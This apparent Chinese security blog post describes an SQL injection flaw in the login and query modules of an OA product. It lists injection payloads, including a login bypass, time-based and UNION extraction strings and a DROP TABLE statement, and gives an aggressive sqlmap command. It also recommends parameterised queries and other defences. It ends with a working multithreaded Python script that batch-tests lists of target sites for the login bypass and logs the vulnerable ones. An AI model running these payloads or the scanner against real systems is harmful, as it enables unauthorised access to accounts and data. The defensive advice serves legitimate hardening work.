免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。
目录
一、漏洞概述
二、漏洞原理分析
三、漏洞复现(以登录接口为例)
四、修复与防护建议
五、漏洞延伸思考
六、总结
一、漏洞概述
漏洞类型:SQL注入
风险等级:高危
影响范围:思OA系统部分历史版本中,涉及动态参数拼接的模块(如登录接口、表单查询、数据导出等)。
漏洞成因:未对用户输入参数进行严格过滤或使用预编译语句,导致攻击者可构造恶意SQL语句,窃取数据库敏感信息、绕过身份认证或执行系统命令。
二、漏洞原理分析
注入触发点
- 典型场景:
- URL参数(如
id=1' AND 1=1--
)、表单输入框(搜索字段)、Cookie参数等未过滤的用户输入。- 动态SQL拼接代码片段示例(伪代码):
String query = "SELECT * FROM user WHERE id = " + request.getParameter("id"); Statement stmt = connection.createStatement(); ResultSet rs = stmt.executeQuery(query);
- 框架依赖:若系统使用ORM框架(如Hibernate)但未正确配置参数化查询,仍可能通过HQL注入漏洞触发。
攻击手法
- 盲注(Boolean/Time-Based):通过页面响应差异或延时判断数据库信息(如
id=1' AND SLEEP(5)--
)。- 联合查询注入:提取数据库表名、字段名(如
UNION SELECT username, password FROM admin
)。- 堆叠查询:利用分号执行多语句攻击(如
id=1'; DROP TABLE users--
)。
三、漏洞复现(以登录接口为例)
步骤示例:
- 输入用户名:
admin'--
,密码任意填写。- 后端生成SQL:
SELECT * FROM users WHERE username='admin'--' AND password='xxx'
。- 结果:注释符
--
使密码校验失效,直接以admin身份登录。自动化验证工具:
- 使用
sqlmap
检测注入点:sqlmap -u "http://target.com/login?username=test&password=123" --data="username=test&password=123" --risk=3 --level=5
四、修复与防护建议
代码层修复
- 参数化查询:强制使用预编译语句(PreparedStatement),禁止字符串拼接。
String query = "SELECT * FROM user WHERE id = ?"; PreparedStatement stmt = connection.prepareStatement(query); stmt.setInt(1, Integer.parseInt(request.getParameter("id")));
- 输入过滤:对数字类型参数强制类型转换,字符串类型使用正则表达式白名单过滤(如仅允许字母数字)。
架构层加固
- 权限最小化:数据库账户仅授予必要权限(禁止
DROP
、FILE
等高危操作)。- WAF部署:通过正则规则拦截常见注入特征(如
UNION SELECT
、SLEEP()
)。持续监控
- 启用数据库审计日志,监控异常SQL语句执行记录。
- 定期使用工具(如OWASP ZAP、Burp Suite)进行渗透测试。
五、漏洞延伸思考
OA系统共性风险
- *思OA与其他OA系统(如泛微、致远)均存在历史版本因快速迭代导致的过滤疏漏。
- 企业应建立补丁管理流程,及时跟进官方安全公告。
防御深度化
- 采用ORM框架时,需结合静态代码扫描(如SonarQube)检查不安全代码模式。
- 引入RASP(运行时应用自保护)技术,实时阻断注入攻击链。
六、漏洞POC
import requests import argparse import threading import time from concurrent.futures import ThreadPoolExecutor from urllib.parse import urljoin # 全局配置 HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } TIMEOUT = 10 # 请求超时时间(秒) THREADS = 10 # 并发线程数 # 注入Payload列表(可根据需求扩展) PAYLOADS = [ {"username": "admin'--", "password": "test"}, # 注释符绕过 {"username": "' OR '1'='1", "password": "test"}, # 永真条件 {"username": "admin", "password": "' OR 1=1#"}, # 密码参数注入 ] def test_sqli(target_url, success_file, fail_file): """ 测试单个目标URL是否存在SQL注入漏洞 """ try: session = requests.Session() login_url = urljoin(target_url, "/login.php") # 根据实际路径调整 for payload in PAYLOADS: try: # 发送POST请求 response = session.post( login_url, data=payload, headers=HEADERS, timeout=TIMEOUT, verify=False # 忽略SSL证书验证(可选) ) response.raise_for_status() # 检测注入成功标志(根据实际系统调整规则) if response.status_code == 302: # 重定向到后台页面 redirect_location = response.headers.get("Location", "") if "dashboard" in redirect_location: print(f"[+] 漏洞存在: {target_url} (Payload: {payload})") with open(success_file, "a") as f: f.write(f"{target_url} | Payload: {payload}\n") return elif "欢迎回来" in response.text: # 页面关键词匹配 print(f"[+] 漏洞存在: {target_url} (Payload: {payload})") with open(success_file, "a") as f: f.write(f"{target_url} | Payload: {payload}\n") return except Exception as e: continue # 所有Payload均未成功 print(f"[-] 未发现漏洞: {target_url}") with open(fail_file, "a") as f: f.write(f"{target_url}\n") except requests.exceptions.RequestException as e: print(f"[!] 连接失败: {target_url} | 错误: {str(e)}") except Exception as e: print(f"[!] 未知错误: {target_url} | 错误: {str(e)}") def main(): # 参数解析 parser = argparse.ArgumentParser(description="OA SQL注入批量检测脚本") parser.add_argument("-f", "--file", required=True, help="目标URL列表文件") parser.add_argument("-o", "--output", default="results", help="结果保存目录") args = parser.parse_args() # 初始化结果文件 success_file = f"{args.output}/success.txt" fail_file = f"{args.output}/fail.txt" with open(success_file, "w") as f1, open(fail_file, "w") as f2: f1.write(" 存在漏洞的URL列表:\n") f2.write(" 未发现漏洞的URL列表:\n") # 读取目标URL with open(args.file, "r") as f: targets = [line.strip() for line in f if line.strip()] # 启动多线程检测 with ThreadPoolExecutor(max_workers=THREADS) as executor: for target in targets: executor.submit(test_sqli, target, success_file, fail_file) if __name__ == "__main__": main()